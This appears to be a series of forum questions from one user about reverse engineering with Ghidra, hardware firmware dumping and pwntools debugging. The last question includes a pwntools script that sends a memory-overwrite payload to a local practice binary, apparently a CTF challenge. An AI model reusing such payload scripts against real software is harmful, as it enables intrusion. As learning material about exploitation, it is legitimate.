I've noticed when reading the decompile in ghidra lots of functions have different colours. I am wondering whether a certain colour means that the function is defined in a library or a certain colour means that the function is user made?
I know this issue has been addressed in other posts but none of the solutions that I have tried have worked and I am yet to find a post on any forum that has a solution for this issue on arch linux. I have tried checking the dmesg output and it is completely silent. I have loaded the ch341 module using modprobe ch341. I'm not sure what other troubleshooting steps I should take. If anyone knows how to fix this issue please kindly tell me.
Many thanks.
This is my first time I've tried to read firmware from spi flash but there doesn't seem to be spi flash on this model. I'm guessing this router model might use NAND flash or some other type but again I'm new so i don't know this stuff. Does anyone know how i can read the firmware off of this device?
Usually when I am reversing an encryption algorithm in ghidra, I recreate it in c. That works most of the time but it is time consuming and you have to make sure everything is perfect. I am wondering if there is some way I can rip out the bare assembly instructions and run it seperately instead of having to recreate the entire thing?
Many times when I am using ghidra, I come across the byte data type. What is this datatype and what is the equivalent in c?
I am thinking of saving the state of an elf binary just to save me some time when reverse engineering, so if anyone knows any ways to do it on linux please tell me. I also want to restore from the save that I have created. Many thanks.
Pwntools has a feature where you can attach the gdb debugger to the process and execute commands. For some reason, it says it has stopped at a certain breakpoint when in reality it has gone further than that. I can tell because it prints text that shouldn't be printed if that breakpoint was enforced.
Here is my code:
from pwn import *
import time
context.terminal = ['alacritty', '-e']
payload_room_2 = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa".encode('ascii')
payload_room_2 = payload_room_2 + b"\xde\xca\xde\x42"
payload_room_2 = payload_room_2 + "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa".encode('ascii')
context.log_level = 'debug'
def print_text(n):
line = n.recv()
print(line.decode())
n = process("./nullhaven")
n.send(b"\x31\x0a")
print_text(n)
n.send(b"\x3e\x3a\x4f\x74\x57\x37\x5d\x59\x65\x46\x3d\x79\x63\x28\x50\x6c\x5f\x73\x47\x69\x38\x60\x67\x50\x2a\x40\x23\x7e\x7c\x20\x5d\x79\x45\x54\x41\x47\x0f\xb0\x00\x00\x01\x3b\x71")
n.send("aaaaaaaaaaaaaaaaaaaaa".encode('ascii'))
print_text(n)
n.send(b"\x32\x0a")
n.send(payload_room_2)
gdb.attach(n, '''
break *0x004030a3
''')
print_text(n)
while True:
sleep(1)